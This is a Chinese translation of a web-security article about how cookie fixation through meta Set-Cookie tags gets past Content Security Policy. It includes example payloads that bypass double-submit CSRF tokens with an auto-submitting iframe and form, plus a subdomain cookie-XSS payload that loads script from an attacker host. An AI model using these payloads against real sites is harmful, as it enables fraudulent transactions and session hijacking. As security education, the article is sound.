2017-01-19 14:12:46
来源:detectify.com 作者:shan66
阅读:1017次
点赞(0)
收藏
翻译:shan66
预估稿费:80RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
前言
我们知道,CSP不会阻止<meta http-equiv ="Set-Cookie" content ="a = b">这样的标签。因此,对于含有XSS漏洞的页面来说,即使提供了CSP保护,攻击者仍然可以通过写入Cookie来发动攻击。下面,我们来考察一些与Cookie篡改漏洞有关的例子。
双重提交Cookie示例
双重提交cookie是一些应用程序和框架用于处理CSRF的技术。这意味着所有表单都必须包含一个在cookie中设置的令牌。如果在表单中发送的令牌与cookie中的令牌不同,则请求被丢弃。这种技术被OWASP推荐为基于会话的令牌的替代方案。
在伪代码中它可能看起来像这样:
//Usersenttheform if(isset($_POST['submit'])){ if($_POST['token']==$_COOKIE['token']){ //Accepttheform }else{ echo"CSRFATTACKDETECTED"; exit(); } }没有CSP的时候,如果应用程序含有XSS漏洞,那么攻击者就可以使用脚本来填写并提交他们想要攻击的任何表单:
<script> document.getElementById('sendmoneyto').value='Mathias'; document.getElementById('form').submit(); </script>使用CSP后,我们就可以(通过使用随机数或限制内联脚本)避免这种情况了。然而,攻击者可以使用以下payload来实现同样的事情:
<metahttp-equiv="Set-Cookie"content="token=NotSoSecretAnyMore">然后,在攻击者的网站上:
<script> functionsubmitForm(){ document.forms[0].submit(); } </script> <iframesrc='http://targetapplication/vulnerabletoxss?parameter=<metahttp-equiv="Set-Cookie"content="token=NotSoSecretAnyMore">'onload="submitForm()"></iframe> <formaction="http://targetapplication/targetform"method="POST"> <inputtype="hidden"name="token"value="NotSoSecretAnyMore"/> <inputtype="hidden"name="sendmoneyto"value="Mathias"/> </form>因为攻击者能够改写令牌,所以他们可以在其页面上的表单中使用新令牌,从而绕过CSRF保护措施。
双会话示例
现实中,使用多个会话Cookie的应用程序是非常少见的。例如,主应用程序使用一个会话Cookie,而“次应用程序”使用另一个会话Cookie。
如果攻击者可以篡改cookie,他们就可以让受害者在主应用程序中使用攻击者的会话cookie。这样的话,就可以让受害者在主应用程序中以攻击者身份登录,而在次应用程序中以受害者身份登录。
如果应用程序从主应用程序提取送货数据,那么受害人在次应用程序中购买的产品就会被发往攻击者的地址。
子域cookie XSS示例
如果子域中存在cookie XSS漏洞,攻击者可以使用cookie篡改漏洞来设置XSS cookie,然后重定向到易受攻击的页面:
<metahttp-equiv="Set-Cookie"content="vulnerableCookie=<scriptsrc=//attackers/page.js>"> <metahttp-equiv="refresh"content="0;URL=http://othersubdomain.vulnerable/page_vulnerable_to_cookie_xss">结论
虽然许多客户端漏洞都可以通过CSP进行缓解,但是Cookie篡改仍然会导致一些安全问题,因为它对于这种漏洞根本不起作用。当开发使用CSP和cookie的应用程序时,一定要注意各种类型攻击的不同之处。
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://labs.detectify.com/2017/01/12/csp-flaws-cookie-fixation/